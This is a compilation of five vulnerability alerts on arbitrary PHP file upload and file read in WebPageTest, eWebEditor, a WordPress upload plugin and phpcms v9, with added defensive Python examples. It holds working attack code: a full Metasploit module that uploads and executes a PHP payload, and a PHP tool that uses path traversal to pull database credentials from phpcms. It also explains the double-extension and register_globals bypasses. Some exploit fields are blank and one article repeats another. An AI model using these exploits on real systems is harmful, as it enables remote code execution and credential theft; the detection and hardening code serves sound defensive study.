Below is a collection of five alerts on the WebPageTest arbitrary PHP file upload vulnerability and related file-upload and file-read issues, provided for reference. The original text was contributed by user "万川人".
Article 1: WebPageTest arbitrary PHP file upload vulnerability alert
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "WebPageTest Arbitrary PHP File Upload",
      'Description'    => %q{
          This module exploits a vulnerability found in WebPageTest's upload feature. By
        default, the resultimage.php file does not verify the user-supplied item before
        saving it to disk, and then places this item in the web directory accessible by
        remote users. This flaw can be abused to gain remote code execution.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'dun',     # Discovery, PoC
          'sinn3r'   # Metasploit
        ],
      'References'     =>
        [
          ['OSVDB', '83822'],
          ['EDB', '19790']
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00"
        },
      'DefaultOptions' =>
        {
          'ExitFunction' => "none"
        },
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          ['WebPageTest v2.6 or older', {}]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Jul 13 ",   # year is missing from the source listing
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to WebPageTest', '/www/'])
      ], self.class)
  end

  def check
    target_uri.path << '/' if target_uri.path[-1,1] != '/'
    base = File.dirname("#{target_uri.path}.")

    # Two probes: the front page must identify itself as WebPagetest and the
    # upload handler must answer. A 200 from resultimage.php is a fingerprint,
    # not proof that the file is written unverified, so treat the result as
    # "version looks affected" rather than a confirmed write.
    res1 = send_request_raw({'uri' => "#{base}/index.php"})
    res2 = send_request_raw({'uri' => "#{base}/work/resultimage.php"})

    if res1 and res1.body =~ /WebPagetest \- Website Performance and Optimization Test/ and
       res2 and res2.code == 200
      return Exploit::CheckCode::Vulnerable
    end

    return Exploit::CheckCode::Safe
  end

  def on_new_session(cli)
    # Only a meterpreter session can delete the dropped file for us.
    if cli.type != "meterpreter"
      print_error("No automatic cleanup for you. Please manually remove: #{@target_path}")
      return
    end

    cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi")
    cli.fs.file.rm(@target_path)
    print_status("#{@target_path} removed")
  end

  def exploit
    peer = "#{rhost}:#{rport}"
    target_uri.path << '/' if target_uri.path[-1,1] != '/'
    base = File.dirname("#{target_uri.path}.")

    p     = payload.encoded
    fname = "blah.php"

    # resultimage.php stores the "file" part under the client-supplied name, so a
    # .php filename is all that is needed; no content-type or magic-byte trick.
    data = Rex::MIME::Message.new
    data.add_part(
      "<?php #{p} ?>",          # PHP payload wrapped in open/close tags
      'multipart/form-data',    # Content Type
      nil,                      # Transfer Encoding
      "form-data; name=\"file\"; filename=\"#{fname}\""  # Content Disposition
    )

    print_status("#{peer} - Uploading payload (#{p.length.to_s} bytes)...")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{base}/work/resultimage.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => data.to_s
    })

    if not res
      print_error("#{peer} - No response from host")
      return
    end

    # Uploads land in results/, which the web server serves directly.
    @target_path = "#{base}/results/#{fname}"
    print_status("#{peer} - Requesting #{@target_path}")
    res = send_request_cgi({'uri' => @target_path})

    handler

    if res and res.code == 404
      print_error("#{peer} - Payload failed to upload")
    end
  end
end
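Detection logic for the request chain the module above produces, added here as an example and not part of the Metasploit module or of WebPageTest: it parses Apache combined-format access log lines and flags a client that POSTs to work/resultimage.php and then fetches a script-extension file from results/ with a 200, while recording lone requests for scripts under results/ as probes. The log lines, addresses and paths are constructed for the example.

```python
import re

# Constructed Apache combined-format log lines for the example; the addresses
# (documentation ranges), timestamps and paths are invented, not from a real host.
SAMPLE_LOG = """\
203.0.113.7 - - [13/Jul/2012:10:01:02 +0000] "GET /www/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [13/Jul/2012:10:01:05 +0000] "POST /www/work/resultimage.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"
203.0.113.7 - - [13/Jul/2012:10:01:06 +0000] "GET /www/results/blah.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
198.51.100.4 - - [13/Jul/2012:10:02:00 +0000] "POST /www/work/resultimage.php HTTP/1.1" 200 12 "-" "wpt-agent"
198.51.100.4 - - [13/Jul/2012:10:02:01 +0000] "GET /www/results/120713_AB_1/1_screen.jpg HTTP/1.1" 200 40321 "-" "wpt-agent"
192.0.2.9 - - [13/Jul/2012:10:03:00 +0000] "GET /www/results/shell.php?cmd=id HTTP/1.1" 404 210 "-" "curl/7.21"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

UPLOAD_HANDLER = "/work/resultimage.php"   # endpoint the module POSTs to
RESULTS_DIR = "/results/"                  # where the module expects the file to land
SCRIPT_EXT = re.compile(r"\.ph(?:p\d?|tml|ar)$", re.IGNORECASE)


def parse(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["file"] = rec["path"].split("?", 1)[0]   # drop the query string
    return rec


def analyse(log_text):
    """Correlate per client IP: a POST to the upload handler followed by a GET of a
    script-extension file under results/. A 200 on that GET means the file exists
    and was executed ("chained"); any other script request is recorded as a probe."""
    posted = set()
    chained, probes = [], []
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        if rec["method"] == "POST" and rec["file"].endswith(UPLOAD_HANDLER):
            posted.add(rec["ip"])
        elif (rec["method"] == "GET" and RESULTS_DIR in rec["file"]
              and SCRIPT_EXT.search(rec["file"])):
            # Test agents upload screenshots (image extensions); a script under
            # results/ should never be requested, let alone served with 200.
            if rec["ip"] in posted and rec["status"] == 200:
                chained.append((rec["ip"], rec["file"]))
            else:
                probes.append((rec["ip"], rec["file"], rec["status"]))
    return {"chained": chained, "probes": probes}


if __name__ == "__main__":
    for key, rows in analyse(SAMPLE_LOG).items():
        print(key, rows)
```

The legitimate test agent in the sample also POSTs to resultimage.php, so the POST alone is not a signal; the distinguishing event is a script extension being requested under results/.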
Article 2: eWebEditor 3.8 for PHP arbitrary file upload EXP vulnerability alert
eWebEditor 3.8 for PHP arbitrary file upload EXP
URL:
file:
Fix: initialise the $aStyle array before populating it
$sUsername = "admin";
$sPassword = "admin";
$aStyle = array();
$aStyle[1] = "gray|||gray|||office|||../uploadfile/|||550|||350|||rar|zip|exe|doc|xls|chm|hlp|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office标准风格,部分常用按钮,标准适合界面宽度|||1|||zh-cn|||0|||500|||300|||0|||版权所有...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1|||1";
Article 3: WordPress Front End Upload v0.5.4.4 arbitrary PHP file upload vulnerability alert
Title: WordPress Front End Upload v0.5.4.4 Arbitrary PHP File Upload Vulnerability
Author: Chris Kellum
Homepage: mondaybynoon.com/
Download: downloads.wordpress.org/plugin/front-end-upload.0.5.4.4.zip
Affected version: 0.5.4.4
Vulnerability analysis
=====================
The plugin does not properly filter file types: a name whose final extension is permitted passes, so files of the following form are accepted:
filename.php.jpg
On hosts where Apache's mod_mime maps the PHP handler by any extension in a multi-dot name (the common AddHandler configuration), such a file is executed as PHP, so a malicious file can be uploaded and run.
When creating the uploads folder for this plugin, the code uses uniqid() to append a unique string to the folder name so that it is harder to reach by direct request.
Example:
www.xxxx.com/wp-content/uploads/feu_9fc12558ac71e6995808cfc590207e87/
However, many WordPress installations allow directory listing of /wp-content/uploads/, so simply look for a folder name beginning with 'feu_' to locate the upload.
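The weak check the advisory describes beside a hardened one, as an added example in Python (not the plugin's code): last_extension_only() accepts anything whose final extension is an image type, which is exactly why shell.php.jpg gets through, while is_safe_upload_name() requires a single path component, an allowlisted final extension, and no script extension in any other dotted segment, and sanitize_upload_name() replaces the client's name with a server-chosen one. The extension sets are the author's assumptions for the example, not taken from the plugin.

```python
import os
import secrets

# Extensions a typical Apache+PHP host may hand to a script handler. With the
# common "AddHandler application/x-httpd-php .php" configuration mod_mime matches
# any dotted segment of the name, so "shell.php.jpg" runs as PHP.
SCRIPT_EXTS = {
    "php", "php3", "php4", "php5", "php7", "phtml", "phar", "pht", "phps",
    "cgi", "pl", "py", "asp", "aspx", "jsp", "shtml", "htaccess",
}
# What the upload form is meant to accept (assumed allowlist for the example).
IMAGE_EXTS = {"jpg", "jpeg", "png", "gif"}


def last_extension_only(filename):
    """The weak check: allow the file if its final extension is an image type.
    This is the behaviour the advisory describes; shell.php.jpg passes."""
    return filename.rsplit(".", 1)[-1].lower() in IMAGE_EXTS


def is_safe_upload_name(filename):
    """Hardened check: a single path component, an allowlisted final extension,
    and no script extension in any other dotted segment."""
    if not filename or "\x00" in filename:
        return False
    base = os.path.basename(filename.replace("\\", "/"))
    if base != filename or base in (".", ".."):
        return False                       # directory parts or traversal
    segments = base.lower().split(".")
    if len(segments) < 2 or segments[-1] not in IMAGE_EXTS:
        return False                       # no extension, or not an allowed image
    if any(seg in SCRIPT_EXTS for seg in segments[:-1]):
        return False                       # shell.php.jpg, a.phtml.png, ...
    return True


def sanitize_upload_name(filename):
    """Return a server-chosen name (random token + validated extension), or None
    if the client name fails the check. Never store the client's string itself."""
    if not is_safe_upload_name(filename):
        return None
    ext = filename.rsplit(".", 1)[-1].lower()
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    for name in ("photo.jpg", "shell.php.jpg", "a.phtml.png", "../photo.jpg"):
        print(name, last_extension_only(name), is_safe_upload_name(name))
```

Renaming on the server also defeats the guessable-path problem: even if the feu_ folder is found through a directory listing, an attacker no longer knows the stored filename.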
Article 4: phpcms v9 arbitrary file read vulnerability exp alert
<?php
/**
 * PHPcms V9 arbitrary file read checker
 * @author Return  Blog: www.creturn.com
 * Email: master@creturn.com
 *
 * Note: this program is for study and reference only and must not be used for
 * illegal activity. You bear the consequences yourself; the author is not responsible.
 */
function showInfo() {
    print '
***********************************************
* PHPcmsV9 Read All File ExpTool By: Return
*
* Blog: www.creturn.com
*
* Email: master@creturn.com
*
* Example: php exp.php www.phpcms.cn
***********************************************
';
}

// The q parameter carries a traversal sequence; the endpoint returns the
// contents of caches/configs/database.php instead of a keyword suggestion.
$exp = '/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../caches/configs/database.php';

if (count($argv) < 2) {
    showInfo();
} else {
    // The URL scheme was stripped from the original listing; plain http is assumed.
    $target = 'http://' . $argv[1] . $exp;
    $data = @file_get_contents($target);

    // A successful read returns the PHP source of database.php; anything else
    // (HTML error page, empty body, false) means the file was not retrieved.
    if ($data === false || strpos($data, '<?php') === false) {
        showInfo();
        echo 'Not found !';
        exit();
    }

    // WARNING: this writes server-supplied PHP to disk and include()s it, so a
    // hostile or compromised target can run arbitrary code on the machine
    // running this tool. Parsing the array out of the text would be safer.
    @file_put_contents('expDatabase.php', $data);
    $database = include 'expDatabase.php';
    showInfo();

    $out  = 'HostName: ' . $database['default']['hostname'] . "\n";
    $out .= 'DataBase: ' . $database['default']['database'] . "\n";
    $out .= 'UserName: ' . $database['default']['username'] . "\n";
    $out .= 'Password: ' . $database['default']['password'] . "\n";
    if (!empty($database)) {
        echo "Found it! :\n\n";
        echo $out;
    }
    @unlink('expDatabase.php');
}
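The class of bug the tool above exploits is a user-supplied fragment concatenated into a filesystem path. The following is an added Python example, not phpcms code: naive_join() shows where a traversal fragment such as ../../caches/configs/database.php really points, and resolve_under() is the containment check that refuses anything outside the intended directory. BASE_DIR is a hypothetical directory chosen for the example and does not describe the real phpcms layout.

```python
import posixpath

# Hypothetical directory the reading code is meant to stay inside; the real
# phpcms layout is not claimed here.
BASE_DIR = "/var/www/phpcms/api/keywords"


def naive_join(base_dir, user_fragment):
    """The vulnerable pattern: concatenate the user-supplied fragment onto a fixed
    prefix and read whatever results. normpath shows where the path really points."""
    return posixpath.normpath(base_dir + "/" + user_fragment)


def resolve_under(base_dir, user_fragment):
    """Hardened version: resolve the fragment relative to base_dir and return the
    path only if it is still base_dir or a descendant of it; otherwise None.
    On a real filesystem also pass the result through os.path.realpath() so a
    symlink inside base_dir cannot point back out of it."""
    base = posixpath.normpath(base_dir)
    # Leading slashes are stripped so an absolute path cannot replace the base.
    candidate = posixpath.normpath(posixpath.join(base, user_fragment.lstrip("/")))
    # The trailing "/" matters: without it "/base2/x" would pass for base "/base".
    if candidate == base or candidate.startswith(base + "/"):
        return candidate
    return None


if __name__ == "__main__":
    for fragment in ("en/common.txt", "../../caches/configs/database.php", "/etc/passwd"):
        print(fragment, "->", naive_join(BASE_DIR, fragment), "|", resolve_under(BASE_DIR, fragment))
```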
Article 5: eWebEditor for PHP arbitrary file upload vulnerability
This was tested only against the latest version, v3.8; whether older versions are affected is unknown. The PHP build of eWebEditor does not keep its configuration in a database: everything lives in php/config.php, which reads as follows:
$sUsername = "admin";
$sPassword = "admin";
$aStyle[1] = "gray|||gray|||office|||../uploadfile/|||550|||350|||rar|zip|exe|doc|xls|chm|hlp|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office标准风格,部分常用按钮,标准适合界面宽度|||1|||zh-cn|||0|||500|||300|||0|||版权所有...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1|||1";
........
All style settings are kept in the array $aStyle, and the file assigns $aStyle[1] without ever initialising the array. With register_globals on, a request parameter such as aStyle[2]=... is imported into that same array, so we can add a style of our own and, inside it, define whatever upload file types we like.
The cause is that simple; an exp follows:
URL:
file:
Fix: initialise the $aStyle array before populating it
$sUsername = "admin";
$sPassword = "admin";
$aStyle = array();
$aStyle[1] = "gray|||gray|||office|||../uploadfile/|||550|||350|||rar|zip|exe|doc|xls|chm|hlp|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office标准风格,部分常用按钮,标准适合界面宽度|||1|||zh-cn|||0|||500|||300|||0|||版权所有...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1|||1";
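The mechanism behind Articles 2 and 5, shown as an added Python example rather than eWebEditor code: register_globals() emulates PHP's register_globals=On by turning aStyle[2]=... from the query string into an element of a global array, load_config() then runs the config.php assignment with and without the $aStyle = array(); fix, and upload_allowed() models an upload handler that reads the extension allowlist from the selected style. The style string and the field position holding the allowlist are constructed for the example and do not claim to be eWebEditor's real field layout.

```python
import re
from urllib.parse import parse_qs

ARRAY_KEY = re.compile(r"^(\w+)\[(\w*)\]$")


def register_globals(query_string):
    """Emulate PHP's register_globals=On: every request parameter becomes a
    global variable, and name[key]=value becomes an element of array $name."""
    globs = {}
    for name, values in parse_qs(query_string, keep_blank_values=True).items():
        m = ARRAY_KEY.match(name)
        if m:
            array_name, key = m.groups()
            globs.setdefault(array_name, {})[key] = values[-1]
        else:
            globs[name] = values[-1]
    return globs


# Constructed stand-in for the style line in php/config.php: fields separated by
# '|||'; here field 2 is taken to be the upload-extension allowlist. The position
# is an illustration, not eWebEditor's real field layout.
SHIPPED_STYLE = "gray|||../uploadfile/|||gif|jpg|jpeg|bmp"
EXT_FIELD = 2


def load_config(globs, initialize):
    """Run the config.php assignments on top of the registered globals.
    initialize=False models the shipped file (only '$aStyle[1] = ...;'),
    initialize=True models the fix ('$aStyle = array();' first), which
    discards whatever the request injected before the shipped style is set."""
    aStyle = {} if initialize else dict(globs.get("aStyle", {}))
    aStyle["1"] = SHIPPED_STYLE
    return aStyle


def allowed_extensions(aStyle, style_id):
    """Extension allowlist of one style, read from the constructed field position."""
    return set(aStyle[style_id].split("|||")[EXT_FIELD].split("|"))


def upload_allowed(aStyle, style_id, filename):
    """The upload handler's decision: look up the requested style and check the
    file's extension against that style's list. An unknown style is refused."""
    if style_id not in aStyle:
        return False
    ext = filename.rsplit(".", 1)[-1].lower()
    return ext in allowed_extensions(aStyle, style_id)


if __name__ == "__main__":
    request = "style=2&aStyle[2]=evil|||../uploadfile/|||php|gif"
    g = register_globals(request)
    print("shipped config:", upload_allowed(load_config(g, False), g["style"], "shell.php"))
    print("fixed config:  ", upload_allowed(load_config(g, True), g["style"], "shell.php"))
```

Initialising the array is the minimal fix; turning register_globals off removes the whole class of variable-injection bugs, not only this one.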